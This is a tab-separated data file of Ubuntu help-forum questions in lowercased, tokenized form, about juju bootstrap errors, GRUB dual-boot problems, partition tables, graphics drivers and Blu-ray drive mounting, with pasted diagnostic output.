82632	juju bootstrap fails to start network on local environment	i 've followed the instructions at https : //juju.ubuntu.com/charmschool and rebooted 5 times ... ... i cant seem to do a juju-bootstrap ( local ) this is the output : amith @ amith-desktop : ~ $ juju bootstrap 2011-11-24 17:08:05,708 info bootstrapping environment 'local ' ( type : local ) ... 2011-11-24 17:08:05,710 info checking for required packages ... 2011-11-24 17:08:06,593 info starting networking ... error : failed to start network default error : internal error child process ( dnsmasq -- strict-order -- bind-interfaces -- pid-file=/var/run/libvirt/network/default.pid -- conf-file= -- except-interface lo -- listen-address 192.168.122.1 -- dhcp-range 192.168.122.2,192.168.122.254 -- dhcp-leasefile=/var/lib/libvirt/dnsmasq/default.leases -- dhcp-lease-max=253 -- dhcp-no-override ) status unexpected : exit status 2 command ' [ 'virsh ' , 'net-start ' , 'default ' ] ' returned non-zero exit status 1 2011-11-24 17:08:07,217 error command ' [ 'virsh ' , 'net-start ' , 'default ' ] ' returned non-zero exit status 1 is there any fix at all ?
82634	how to convert .tex into .odt ?	i wish to convert a .tex file into an .odt file . can you suggest a good step-by-step solution ?
82637	after installing macbuntu theme , vmware menus disappear	i installed the macbuntu theme , for ubuntu 10.10 , and the menus from the vmware application disappeared . the other applications are correctly showing the menus . any idea how to get back the vmware menus ( other them completely uninstalling macbuntu ) ?
82638	weird network problems	i 'm having some very strange network problems that i have no idea what is causing them . here are some of the symptoms ( across all browsers ) : random timeouts of webpages . difficulty doing any sort of post to a webserver . forum posts , the log in of this forum , etc . some webpages do n't load at all : facebook , twitter , and others . ca n't upload any files through any sort of standard html post form . at all . it seems to upload a few seconds of the file then just freezes . it is definitely not the dns server as i 've tried both opendns and the google dns servers . i 've already tried disabling ipv6 to no avail . lspci does n't show any information about an ethernet card . everything works perfectly fine in vista though , no problems , so it probably is n't a router/modem issue . now , here 's where things get weird : the exact same symptoms happen on two completely different machines running ubuntu , but neither of them struggle on windows . arguably , if it were my modem/router , things would n't work on windows . but , then again , if it were the network drivers ubuntu uses for my particular card , why is it that i have the same problems on two different machines ? help is very much appreciated , thanks in advance . - james .
82644	open eclipse in elevated privileges	i 'm trying to run a php site using eclipse pdt . i set it up to copy the files to var/www/ . it gives no error but only opens localhost/myprojname in its browser . so i 'm assuming i need to give eclipse some privileges to copy files there . how do i do this ? i dont even know where eclipse is located , i open it via dash home .
82652	file association to unlisted application	while browsing files in nautilus , i want to open a tex file with kile . but , when i get to a dialog similar to the screenshot below , i do not see kile . yet , i see it in the `` open with '' menu . how do i fix this ?
82653	video card not found on an hp mini 210-2000ew	i 've installed newest ubuntu on my hp mini 210-2000ew and i have problems with drivers . my system works very slow , because it does n't even recognize my graphic card . could someone give me links for websites where i can get them ? i found some in intel website , but they give me link for another site , in which i have no idea what should i download . please help me with those drivers .
82658	identify my terminal session that started a particular process	i 'm using gnome on ubuntu . i often have 8-20 terminal sessions open and in some of them i have su 'd to a different user . the specific problem that caused me to write this query happens when using git status , but this is more general issue . git status will tell me i have an uncontrolled file .foo.java.swp . this means that in one of my terminal sessions i have vi open on foo.java . i need a script or tool that would tell me in which terminal session that vi is running . i can do a `` ps aux | grep vi '' to pretty easily find the pid of the particular vi . it would be nice if the tool highlighted the terminal on my task bar in some way . thanks . -sam
82661	grub workaround for can not find uuid in dual boot system fails and now grub wo n't boot anything	new clean install of x86 11.10 desktop . dual boot with windows xp and linux on separate drives . after install grub will not boot windows , but by changing boot drive boots fine . when i go to fix this i find from http : //bootinfoscript.sourceforge.net/ and a link to http : //sourceforge.net/apps/mediawiki/bootinfoscript/index.php ? title=boot_problems : search my problem , the message on the grub boot error screen : error : no such device : 6⋯⋯⋯⋯⋯⋯⋯ so i follow the step2 and compare the output of : sudo blkid and sudo nano /boot/grub/grub.cfg the uuids in both match for the windows drive , so i do the fix in step 4 `` remove the search lines for … '' in /usr/lib/grub/grub-mkconfig_lib , commenting out the three lines as before⋯ # if fs_uuid= '' ` $ { grub_probe } -- device $ { device } -- target=fs_uuid 2 > /dev/null` '' ; then # echo `` search -- no-floppy -- fs-uuid -- set $ { fs_uuid } '' # fi i run sudo update-grub and check /etc/default/grub.cfg and see that it now identifies the windows partition not by uuid , which i suppose is the workaround . but now when i try to boot 11.10 desktop , i get : error : no such partition… … and when i try to boot windows , i get : error : invalid signature . so now , how do i fix this… the boot problem and find a workaround that works ?
82663	why do packages fail to install from command line	every once in a while i ca n't install packages in ubuntu 11.04 . i 'll try to run the software center and it and it will pop up then disappear . if i call it from the command line it says it seg-faults . and then trying to install anything from the command line i get this : sudo apt-get install pdftk reading package lists ... done and thats all i get for anything i try . usually restarting fixes the problem but its very annoying .
82669	overlapping partitions problem	i have got a new hp g6 laptop and when trying to install ubuntu , i face this problem gparted sees the whole hard drive as unallocated disk space and the output of fdisk -lu is disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xc13cbdc4 device boot start end blocks id system /dev/sda1 * 2048 409599 203776 7 hpfs/ntfs partition 1 does not end on cylinder boundary . /dev/sda2 409600 159584255 79587328 7 hpfs/ntfs partition 2 does not end on cylinder boundary . /dev/sda3 1208201216 1241939967 16869376 7 hpfs/ntfs /dev/sda4 159584256 1250260991 545338368 f w95 ext 'd ( lba ) partition 4 does not end on cylinder boundary . /dev/sda5 159586304 683874303 262144000 7 hpfs/ntfs /dev/sda6 683876352 1208201215 262162432 7 hpfs/ntfs /dev/sda7 1241942016 1250260991 4159488 b w95 fat32 partition table entries are not in disk order so is there an easy way to fix the overlapping partitions problem ? only the disk utility can view the partition layout i also tried the following command sudo sfdisk -us -l /dev/sda and it gives the following disk /dev/sda : 77825 cylinders , 255 heads , 63 sectors/track warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents differently . units = sectors of 512 bytes , counting from 0 device boot start end # sectors id system /dev/sda1 * 2048 409599 407552 7 hpfs/ntfs /dev/sda2 409600 159584255 159174656 7 hpfs/ntfs end : ( c , h , s ) expected ( 1023,254,63 ) found ( 717,232,27 ) /dev/sda3 1208201216 1241939967 33738752 7 hpfs/ntfs /dev/sda4 159584256 1250260991 1090676736 f w95 ext 'd ( lba ) start : ( c , h , s ) expected ( 1023,254,63 ) found ( 717,232,28 ) end : ( c , h , s ) expected ( 1023,254,63 ) found ( 1,37,36 ) /dev/sda5 159586304 683874303 524288000 7 hpfs/ntfs start : ( c , h , s ) expected ( 1023,254,63 ) found ( 717,200,60 ) end : ( c , h , s ) expected ( 1023,254,63 ) found ( 585,116,43 ) /dev/sda6 683876352 1208201215 524324864 7 hpfs/ntfs start : ( c , h , s ) expected ( 1023,254,63 ) found ( 585,85,13 ) end : ( c , h , s ) expected ( 1023,254,63 ) found ( 455,76,5 ) /dev/sda7 1241942016 1250260991 8318976 b w95 fat32 start : ( c , h , s ) expected ( 1023,254,63 ) found ( 507,208,22 ) end : ( c , h , s ) expected ( 1023,254,63 ) found ( 1,37,36 ) so how can i fix those boundaries ?
82670	gnome - shell does n't load	i have a problem and to be honest am even a bit desperate , because i think that everything should be working . ( and it worked couple hours ago just fine and then suddenly it just decided not to load ) kernel : 3.0.13 graphic : ati mobilitiy radeon 4500 drivers : latest fglrx from command line , then tried to install fglrx package from software center , then from proprietary packages installer and then switched to drivers right from ati site ( 11.11 ) ( do n't remember the order , but i tried everyone possible i know ) gnome shell installed without problem , after few hours using it it started to flicker and blink and doing some seriously not nice thing ( as described in some previous question ) so i tried to solve it by reinstalling graphic drivers , tried every one of those four versions ( proprietary drivers , command line , software center , ati site ) and after that i just ca n't log into gnome shell . gnome shell shows as an option in lightdm and when i try to log in it automatically changes into `` safemode '' gnome shell ( god , i just forget how is it properly called ) without animation and all those fancy stuff . can anyone try to help me ?
82681	how to stop ( or start ) update manager from startup	i can not stop the update manager notifying in the startup . how to disable it from startup ? i searched in startup applications , but no update manager is listed . also not in software sources . i 'm using 11.10
82683	what juju charm hooks are available and what does each one do ?	i am trying to understand the hooks for a juju charm , some of them are rather obvious and easy to understand ( start , stop , install , etc ) , others not really . how many hooks are there , when are they called , for what function ? i am looking for a good list of hooks and their descriptions .
82684	lowering compiz memory usage	i have been following the updates that appear every week in how they affect the performance and resource usage of compiz since i installed 11.10 ( right now i am testing 12.04 and 14.04 ) . for what i have seen , the cpu and memory usage have lowered ( specially memory ) . i am comparing installing 12.04/14.04 without any updates and then applying all updates and also comparing 12.04 to 14.04 . for example nautilus is using less than 35 mb ( for me it was between 70 mb and 150 mb doing the same activities with it several versions ago ) . other processes have also received some kind of optimizations which have lowered my total memory usage from around 850 mb to 610 mb ( i also use services like apache , mysql , etc.. ) but after all of this time , the only one that has stayed almost the same is compiz . it still uses more than 100mb to start . only using the desktop with unity and no other programs running , it takes ( right now ) 133 mb . what options can i use to lower the memory footprint without compromising the stability of unity ( for example removing the opengl plugin from compiz config is a bad idea ) . what optimizations can be done to lower the memory usage of compiz ? note - i have compiz config settings manager ( ccsm ) installed already .
82687	10.04 - > 10.10 - problem after upgrade	so i just upgraded from 10.04 to 10.10 following this method , but now when i 'm choosing ubuntu in my grub , the screen with the ubuntu logo appears for like 2 sec and then my screen just go in `` idle '' mode ( the computer is still running ) and i ca n't do anything else than doing a force restart of the machine . i tried to launch the recovery mode , i logged in and when i entered startx same thing happened . i really have no idea of what the problem is , so if someone has one , please let me know . ( i do n't know what other details i could give you , so just ask if you need something else ) edit i tried the `` repair broken packages '' option in the `` recovery mode '' and i get the error that it ca n't remove fglrx . i tried : sudo apt-get remove -- purge xorg-driver-fglrx fglrx* but it wo n't remove it . i get : ... dpkg-divert : mismatch on package when removing 'diversion of /usr/lib/libgl.so.1.2 to /usr/lib/fglrx/libgl.so.1.2.xlibmesa by fglrx' found 'diversion of /usr/lib/libgl.so.1.2 to /usr/lib/fglrx/libgl.so.1.2.xlibmesa by xorg-driver-fglrx' dpkg : error processing fglrx ( -- remove ) : subprocess installed post-removal script returned error exit status 2 processing triggers for ureadahead ... errors were encountered while processing : fglrx e : sub-process /usr/bin/dpkg returned an error code ( 1 ) so i guess this is my problem , how could i fix that ? ( my video card is the asus eah4870 )
82689	sony bravia screen resolution problem when using docky	this is what it looks like : when the laptop ( msi u100 ) starts up it takes up all available space on the tv screen . about a second after logging in the black bar at the bottom appears . the strange thing is that as you can see the menus can be visible over it , also the dock ( docky app ) , and any fullscreen application ( not maximised , but fullscreen ) . so what would be the problem here ? the source of the problem is the docky application . any ideas ?
82694	how to mount a blu-ray drive ?	maybe it is for the best to close this question . this has nothing to do with a bluray drive in general anymore . probably a hardware defect . i will try to test it with a windows system and different cables again ... thx so far . i have a bluray/dvd/cdrom drive with sata . ubuntu wont find it under /dev/sd wodim -- devices wodim : overview of accessible drives ( 1 found ) : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 dev='/dev/sg2 ' rwrw -- : 'hl-dt-st ' 'bddvdrw ch08ls10' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - cdrecord -scanbus scsibus2 : 2,0,0 200 ) 'hl-dt-st ' 'bddvdrw ch08ls10 ' '2.00 ' removable cd-rom fdisk dont even lists it . ubuntu only automounts blank dvds , but neither cdrom nor blurays . i also changed the sata slot , sata cable and the power cable . the drive works with a windows system . this happens when i try to mount : sudo mount -t auto /dev/scd0 /media/bluray mount : you must specify the filesystem type i tried all filesystems there are . i also installed makemkv . it finds the drive but not the disc . here is my /dev ls -al /dev total 12 drwxr-xr-x 17 root root 4420 2011-11-25 19:36 . drwxr-xr-x 28 root root 4096 2011-11-25 07:12 .. crw -- -- -- - 1 root root 10 , 235 2011-11-25 19:28 autofs -rw-r -- r -- 1 root root 630 2011-11-25 19:28 .blkid.tab -rw-r -- r -- 1 root root 630 2011-11-25 19:28 .blkid.tab.old drwxr-xr-x 2 root root 700 2011-11-25 19:27 block drwxr-xr-x 2 root root 100 2011-11-25 19:27 bsg crw -- -- -- - 1 root root 10 , 234 2011-11-25 19:28 btrfs-control drwxr-xr-x 3 root root 60 2011-11-25 19:27 bus drwxr-xr-x 2 root root 3820 2011-11-25 19:28 char crw -- -- -- - 1 root root 5 , 1 2011-11-25 19:28 console lrwxrwxrwx 1 root root 11 2011-11-25 19:28 core - > /proc/kcore drwxr-xr-x 2 root root 60 2011-11-25 19:28 cpu crw -- -- -- - 1 root root 10 , 60 2011-11-25 19:28 cpu_dma_latency drwxr-xr-x 7 root root 140 2011-11-25 19:27 disk crw -- -- -- - 1 root root 10 , 61 2011-11-25 19:28 ecryptfs crw-rw -- -- 1 root video 29 , 0 2011-11-25 19:28 fb0 lrwxrwxrwx 1 root root 13 2011-11-25 19:28 fd - > /proc/self/fd crw-rw-rw- 1 root root 1 , 7 2011-11-25 19:28 full crw-rw-rw- 1 root fuse 10 , 229 2011-11-25 19:28 fuse crw -- -- -- - 1 root root 251 , 0 2011-11-25 19:28 hidraw0 crw -- -- -- - 1 root root 251 , 1 2011-11-25 19:28 hidraw1 crw -- -- -- - 1 root root 10 , 228 2011-11-25 19:28 hpet lrwxrwxrwx 1 root root 14 2011-11-25 19:27 .initramfs - > /run/initramfs drwxr-xr-x 4 root root 220 2011-11-25 19:28 input crw -- -- -- - 1 root root 1 , 11 2011-11-25 19:28 kmsg srw-rw-rw- 1 root root 0 2011-11-25 19:28 log brw-rw -- -- 1 root disk 7 , 0 2011-11-25 19:28 loop0 brw-rw -- -- 1 root disk 7 , 1 2011-11-25 19:28 loop1 brw-rw -- -- 1 root disk 7 , 2 2011-11-25 19:28 loop2 brw-rw -- -- 1 root disk 7 , 3 2011-11-25 19:28 loop3 brw-rw -- -- 1 root disk 7 , 4 2011-11-25 19:28 loop4 brw-rw -- -- 1 root disk 7 , 5 2011-11-25 19:28 loop5 brw-rw -- -- 1 root disk 7 , 6 2011-11-25 19:28 loop6 brw-rw -- -- 1 root disk 7 , 7 2011-11-25 19:28 loop7 drwxr-xr-x 2 root root 60 2011-11-25 19:27 mapper crw -- -- -- - 1 root root 10 , 227 2011-11-25 19:28 mcelog crw-r -- -- - 1 root kmem 1 , 1 2011-11-25 19:28 mem drwxr-xr-x 2 root root 60 2011-11-25 19:27 net crw -- -- -- - 1 root root 10 , 59 2011-11-25 19:28 network_latency crw -- -- -- - 1 root root 10 , 58 2011-11-25 19:28 network_throughput crw-rw-rw- 1 root root 1 , 3 2011-11-25 19:28 null crw-rw-rw- 1 root root 195 , 0 2011-11-25 19:28 nvidia0 crw-rw-rw- 1 root root 195 , 255 2011-11-25 19:28 nvidiactl crw -- -- -- - 1 root root 1 , 12 2011-11-25 19:28 oldmem crw-r -- -- - 1 root kmem 1 , 4 2011-11-25 19:28 port crw -- -- -- - 1 root root 108 , 0 2011-11-25 19:28 ppp crw -- -- -- - 1 root root 10 , 1 2011-11-25 19:28 psaux crw-rw-rw- 1 root tty 5 , 2 2011-11-25 20:00 ptmx drwxr-xr-x 2 root root 0 2011-11-25 19:27 pts brw-rw -- -- 1 root disk 1 , 0 2011-11-25 19:28 ram0 brw-rw -- -- 1 root disk 1 , 1 2011-11-25 19:28 ram1 brw-rw -- -- 1 root disk 1 , 10 2011-11-25 19:28 ram10 brw-rw -- -- 1 root disk 1 , 11 2011-11-25 19:28 ram11 brw-rw -- -- 1 root disk 1 , 12 2011-11-25 19:28 ram12 brw-rw -- -- 1 root disk 1 , 13 2011-11-25 19:28 ram13 brw-rw -- -- 1 root disk 1 , 14 2011-11-25 19:28 ram14 brw-rw -- -- 1 root disk 1 , 15 2011-11-25 19:28 ram15 brw-rw -- -- 1 root disk 1 , 2 2011-11-25 19:28 ram2 brw-rw -- -- 1 root disk 1 , 3 2011-11-25 19:28 ram3 brw-rw -- -- 1 root disk 1 , 4 2011-11-25 19:28 ram4 brw-rw -- -- 1 root disk 1 , 5 2011-11-25 19:28 ram5 brw-rw -- -- 1 root disk 1 , 6 2011-11-25 19:28 ram6 brw-rw -- -- 1 root disk 1 , 7 2011-11-25 19:28 ram7 brw-rw -- -- 1 root disk 1 , 8 2011-11-25 19:28 ram8 brw-rw -- -- 1 root disk 1 , 9 2011-11-25 19:28 ram9 crw-rw-rw- 1 root root 1 , 8 2011-11-25 19:28 random crw-rw-r -- + 1 root root 10 , 62 2011-11-25 19:28 rfkill lrwxrwxrwx 1 root root 4 2011-11-25 19:28 rtc - > rtc0 crw -- -- -- - 1 root root 254 , 0 2011-11-25 19:28 rtc0 lrwxrwxrwx 1 root root 3 2011-11-25 19:38 scd0 - > sr0 brw-rw -- -- 1 root disk 8 , 0 2011-11-25 19:28 sda brw-rw -- -- 1 root disk 8 , 1 2011-11-25 19:28 sda1 brw-rw -- -- 1 root disk 8 , 2 2011-11-25 19:28 sda2 brw-rw -- -- 1 root disk 8 , 3 2011-11-25 19:28 sda3 brw-rw -- -- 1 root disk 8 , 5 2011-11-25 19:28 sda5 brw-rw -- -- 1 root disk 8 , 6 2011-11-25 19:28 sda6 brw-rw -- -- 1 root disk 8 , 16 2011-11-25 19:28 sdb brw-rw -- -- 1 root disk 8 , 17 2011-11-25 19:28 sdb1 crw-rw -- -- 1 root disk 21 , 0 2011-11-25 19:28 sg0 crw-rw -- -- 1 root disk 21 , 1 2011-11-25 19:28 sg1 crw-rw -- -- + 1 root cdrom 21 , 2 2011-11-25 19:28 sg2 lrwxrwxrwx 1 root root 8 2011-11-25 19:28 shm - > /run/shm crw -- -- -- - 1 root root 10 , 231 2011-11-25 19:28 snapshot drwxr-xr-x 4 root root 280 2011-11-25 19:28 snd brw-rw -- -- + 1 root cdrom 11 , 0 2011-11-25 19:38 sr0 lrwxrwxrwx 1 root root 15 2011-11-25 19:28 stderr - > /proc/self/fd/2 lrwxrwxrwx 1 root root 15 2011-11-25 19:28 stdin - > /proc/self/fd/0 lrwxrwxrwx 1 root root 15 2011-11-25 19:28 stdout - > /proc/self/fd/1 crw-rw-rw- 1 root tty 5 , 0 2011-11-25 19:35 tty crw -- w -- -- 1 root tty 4 , 0 2011-11-25 19:28 tty0 crw -- -- -- - 1 root root 4 , 1 2011-11-25 19:28 tty1 crw -- w -- -- 1 root tty 4 , 10 2011-11-25 19:28 tty10 crw -- w -- -- 1 root tty 4 , 11 2011-11-25 19:28 tty11 crw -- w -- -- 1 root tty 4 , 12 2011-11-25 19:28 tty12 crw -- w -- -- 1 root tty 4 , 13 2011-11-25 19:28 tty13 crw -- w -- -- 1 root tty 4 , 14 2011-11-25 19:28 tty14 crw -- w -- -- 1 root tty 4 , 15 2011-11-25 19:28 tty15 crw -- w -- -- 1 root tty 4 , 16 2011-11-25 19:28 tty16 crw -- w -- -- 1 root tty 4 , 17 2011-11-25 19:28 tty17 crw -- w -- -- 1 root tty 4 , 18 2011-11-25 19:28 tty18 crw -- w -- -- 1 root tty 4 , 19 2011-11-25 19:28 tty19 crw -- -- -- - 1 root root 4 , 2 2011-11-25 19:28 tty2 crw -- w -- -- 1 root tty 4 , 20 2011-11-25 19:28 tty20 crw -- w -- -- 1 root tty 4 , 21 2011-11-25 19:28 tty21 crw -- w -- -- 1 root tty 4 , 22 2011-11-25 19:28 tty22 crw -- w -- -- 1 root tty 4 , 23 2011-11-25 19:28 tty23 crw -- w -- -- 1 root tty 4 , 24 2011-11-25 19:28 tty24 crw -- w -- -- 1 root tty 4 , 25 2011-11-25 19:28 tty25 crw -- w -- -- 1 root tty 4 , 26 2011-11-25 19:28 tty26 crw -- w -- -- 1 root tty 4 , 27 2011-11-25 19:28 tty27 crw -- w -- -- 1 root tty 4 , 28 2011-11-25 19:28 tty28 crw -- w -- -- 1 root tty 4 , 29 2011-11-25 19:28 tty29 crw -- -- -- - 1 root root 4 , 3 2011-11-25 19:28 tty3 crw -- w -- -- 1 root tty 4 , 30 2011-11-25 19:28 tty30 crw -- w -- -- 1 root tty 4 , 31 2011-11-25 19:28 tty31 crw -- w -- -- 1 root tty 4 , 32 2011-11-25 19:28 tty32 crw -- w -- -- 1 root tty 4 , 33 2011-11-25 19:28 tty33 crw -- w -- -- 1 root tty 4 , 34 2011-11-25 19:28 tty34 crw -- w -- -- 1 root tty 4 , 35 2011-11-25 19:28 tty35 crw -- w -- -- 1 root tty 4 , 36 2011-11-25 19:28 tty36 crw -- w -- -- 1 root tty 4 , 37 2011-11-25 19:28 tty37 crw -- w -- -- 1 root tty 4 , 38 2011-11-25 19:28 tty38 crw -- w -- -- 1 root tty 4 , 39 2011-11-25 19:28 tty39 crw -- -- -- - 1 root root 4 , 4 2011-11-25 19:28 tty4 crw -- w -- -- 1 root tty 4 , 40 2011-11-25 19:28 tty40 crw -- w -- -- 1 root tty 4 , 41 2011-11-25 19:28 tty41 crw -- w -- -- 1 root tty 4 , 42 2011-11-25 19:28 tty42 crw -- w -- -- 1 root tty 4 , 43 2011-11-25 19:28 tty43 crw -- w -- -- 1 root tty 4 , 44 2011-11-25 19:28 tty44 crw -- w -- -- 1 root tty 4 , 45 2011-11-25 19:28 tty45 crw -- w -- -- 1 root tty 4 , 46 2011-11-25 19:28 tty46 crw -- w -- -- 1 root tty 4 , 47 2011-11-25 19:28 tty47 crw -- w -- -- 1 root tty 4 , 48 2011-11-25 19:28 tty48 crw -- w -- -- 1 root tty 4 , 49 2011-11-25 19:28 tty49 crw -- -- -- - 1 root root 4 , 5 2011-11-25 19:28 tty5 crw -- w -- -- 1 root tty 4 , 50 2011-11-25 19:28 tty50 crw -- w -- -- 1 root tty 4 , 51 2011-11-25 19:28 tty51 crw -- w -- -- 1 root tty 4 , 52 2011-11-25 19:28 tty52 crw -- w -- -- 1 root tty 4 , 53 2011-11-25 19:28 tty53 crw -- w -- -- 1 root tty 4 , 54 2011-11-25 19:28 tty54 crw -- w -- -- 1 root tty 4 , 55 2011-11-25 19:28 tty55 crw -- w -- -- 1 root tty 4 , 56 2011-11-25 19:28 tty56 crw -- w -- -- 1 root tty 4 , 57 2011-11-25 19:28 tty57 crw -- w -- -- 1 root tty 4 , 58 2011-11-25 19:28 tty58 crw -- w -- -- 1 root tty 4 , 59 2011-11-25 19:28 tty59 crw -- -- -- - 1 root root 4 , 6 2011-11-25 19:28 tty6 crw -- w -- -- 1 root tty 4 , 60 2011-11-25 19:28 tty60 crw -- w -- -- 1 root tty 4 , 61 2011-11-25 19:28 tty61 crw -- w -- -- 1 root tty 4 , 62 2011-11-25 19:28 tty62 crw -- w -- -- 1 root tty 4 , 63 2011-11-25 19:28 tty63 crw -- w -- -- 1 root tty 4 , 7 2011-11-25 19:28 tty7 crw -- w -- -- 1 root tty 4 , 8 2011-11-25 19:28 tty8 crw -- w -- -- 1 root tty 4 , 9 2011-11-25 19:28 tty9 crw -- -- -- - 1 root root 5 , 3 2011-11-25 19:28 ttyprintk crw-rw -- -- 1 root dialout 4 , 64 2011-11-25 19:28 ttys0 crw-rw -- -- 1 root dialout 4 , 65 2011-11-25 19:28 ttys1 crw-rw -- -- 1 root dialout 4 , 74 2011-11-25 19:28 ttys10 crw-rw -- -- 1 root dialout 4 , 75 2011-11-25 19:28 ttys11 crw-rw -- -- 1 root dialout 4 , 76 2011-11-25 19:28 ttys12 crw-rw -- -- 1 root dialout 4 , 77 2011-11-25 19:28 ttys13 crw-rw -- -- 1 root dialout 4 , 78 2011-11-25 19:28 ttys14 crw-rw -- -- 1 root dialout 4 , 79 2011-11-25 19:28 ttys15 crw-rw -- -- 1 root dialout 4 , 80 2011-11-25 19:28 ttys16 crw-rw -- -- 1 root dialout 4 , 81 2011-11-25 19:28 ttys17 crw-rw -- -- 1 root dialout 4 , 82 2011-11-25 19:28 ttys18 crw-rw -- -- 1 root dialout 4 , 83 2011-11-25 19:28 ttys19 crw-rw -- -- 1 root dialout 4 , 66 2011-11-25 19:28 ttys2 crw-rw -- -- 1 root dialout 4 , 84 2011-11-25 19:28 ttys20 crw-rw -- -- 1 root dialout 4 , 85 2011-11-25 19:28 ttys21 crw-rw -- -- 1 root dialout 4 , 86 2011-11-25 19:28 ttys22 crw-rw -- -- 1 root dialout 4 , 87 2011-11-25 19:28 ttys23 crw-rw -- -- 1 root dialout 4 , 88 2011-11-25 19:28 ttys24 crw-rw -- -- 1 root dialout 4 , 89 2011-11-25 19:28 ttys25 crw-rw -- -- 1 root dialout 4 , 90 2011-11-25 19:28 ttys26 crw-rw -- -- 1 root dialout 4 , 91 2011-11-25 19:28 ttys27 crw-rw -- -- 1 root dialout 4 , 92 2011-11-25 19:28 ttys28 crw-rw -- -- 1 root dialout 4 , 93 2011-11-25 19:28 ttys29 crw-rw -- -- 1 root dialout 4 , 67 2011-11-25 19:28 ttys3 crw-rw -- -- 1 root dialout 4 , 94 2011-11-25 19:28 ttys30 crw-rw -- -- 1 root dialout 4 , 95 2011-11-25 19:28 ttys31 crw-rw -- -- 1 root dialout 4 , 68 2011-11-25 19:28 ttys4 crw-rw -- -- 1 root dialout 4 , 69 2011-11-25 19:28 ttys5 crw-rw -- -- 1 root dialout 4 , 70 2011-11-25 19:28 ttys6 crw-rw -- -- 1 root dialout 4 , 71 2011-11-25 19:28 ttys7 crw-rw -- -- 1 root dialout 4 , 72 2011-11-25 19:28 ttys8 crw-rw -- -- 1 root dialout 4 , 73 2011-11-25 19:28 ttys9 d rwxr-xr-x 3 root root 60 2011-11-25 19:28 .udev crw-r -- -- - 1 root root 10 , 223 2011-11-25 19:28 uinput crw-rw-rw- 1 root root 1 , 9 2011-11-25 19:28 urandom drwxr-xr-x 2 root root 60 2011-11-25 19:27 usb crw -- -- -- - 1 root root 252 , 0 2011-11-25 19:28 usbmon0 crw -- -- -- - 1 root root 252 , 1 2011-11-25 19:28 usbmon1 crw -- -- -- - 1 root root 252 , 2 2011-11-25 19:28 usbmon2 crw -- -- -- - 1 root root 252 , 3 2011-11-25 19:28 usbmon3 crw -- -- -- - 1 root root 252 , 4 2011-11-25 19:28 usbmon4 crw -- -- -- - 1 root root 252 , 5 2011-11-25 19:28 usbmon5 crw -- -- -- - 1 root root 252 , 6 2011-11-25 19:28 usbmon6 crw -- -- -- - 1 root root 252 , 7 2011-11-25 19:28 usbmon7 crw -- -- -- - 1 root root 252 , 8 2011-11-25 19:28 usbmon8 drwxr-xr-x 4 root root 80 2011-11-25 19:28 v4l crw -- -- -- - 1 root root 10 , 57 2011-11-25 19:28 vboxdrv crw -- -- -- - 1 root root 10 , 56 2011-11-25 19:28 vboxnetctl drwxr-x -- - 4 root vboxusers 80 2011-11-25 19:28 vboxusb crw-rw -- -- 1 root tty 7 , 0 2011-11-25 19:28 vcs crw-rw -- -- 1 root tty 7 , 1 2011-11-25 19:28 vcs1 crw-rw -- -- 1 root tty 7 , 2 2011-11-25 19:28 vcs2 crw-rw -- -- 1 root tty 7 , 3 2011-11-25 19:28 vcs3 crw-rw -- -- 1 root tty 7 , 4 2011-11-25 19:28 vcs4 crw-rw -- -- 1 root tty 7 , 5 2011-11-25 19:28 vcs5 crw-rw -- -- 1 root tty 7 , 6 2011-11-25 19:28 vcs6 crw-rw -- -- 1 root tty 7 , 128 2011-11-25 19:28 vcsa crw-rw -- -- 1 root tty 7 , 129 2011-11-25 19:28 vcsa1 crw-rw -- -- 1 root tty 7 , 130 2011-11-25 19:28 vcsa2 crw-rw -- -- 1 root tty 7 , 131 2011-11-25 19:28 vcsa3 crw-rw -- -- 1 root tty 7 , 132 2011-11-25 19:28 vcsa4 crw-rw -- -- 1 root tty 7 , 133 2011-11-25 19:28 vcsa5 crw-rw -- -- 1 root tty 7 , 134 2011-11-25 19:28 vcsa6 crw -- -- -- - 1 root root 10 , 63 2011-11-25 19:28 vga_arbiter crw-rw -- -- + 1 root video 81 , 0 2011-11-25 19:28 video0 crw-rw-rw- 1 root root 1 , 5 2011-11-25 19:28 zero sg_scan -i gives me : sudo sg_scan -i /dev/sg0 : scsi0 channel=0 id=0 lun=0 [ em ] ata st31000524ns sn12 [ rmb=0 cmdq=0 pqual=0 pdev=0x0 ] /dev/sg1 : scsi0 channel=0 id=1 lun=0 [ em ] ata wdc wd15eads-00s 01.0 [ rmb=0 cmdq=0 pqual=0 pdev=0x0 ] /dev/sg2 : scsi2 channel=0 id=0 lun=0 [ em ] hl-dt-st bddvdrw ch08ls10 2.00 [ rmb=1 cmdq=0 pqual=0 pdev=0x5 ] sg_map gives me : /dev/sg0 /dev/sda /dev/sg1 /dev/sdb /dev/sg2 /dev/scd0 lsscsi -l gives me : [ 0:0:0:0 ] disk ata st31000524ns sn12 /dev/sda state=running queue_depth=1 scsi_level=6 type=0 device_blocked=0 timeout=30 [ 0:0:1:0 ] disk ata wdc wd15eads-00s 01.0 /dev/sdb state=running queue_depth=1 scsi_level=6 type=0 device_blocked=0 timeout=30 [ 2:0:0:0 ] cd/dvd hl-dt-st bddvdrw ch08ls10 2.00 /dev/sr0 state=running queue_depth=1 scsi_level=6 type=5 device_blocked=0 timeout=30 my udf mod is : filename : /lib/modules/3.0.0-14-generic/kernel/fs/udf/udf.ko license : gpl description : universal disk format filesystem author : ben fennema srcversion : 6abde012374d96b9685b8e5 depends : crc-itu-t vermagic : 3.0.0-14-generic smp mod_unload modversions do i need special drivers or mods enabled ? do i need to change some bios settings ? edit : somehow i am now able to fire the mount command without any filesystem errors , but now i get : mount : no medium found on /dev/sr0
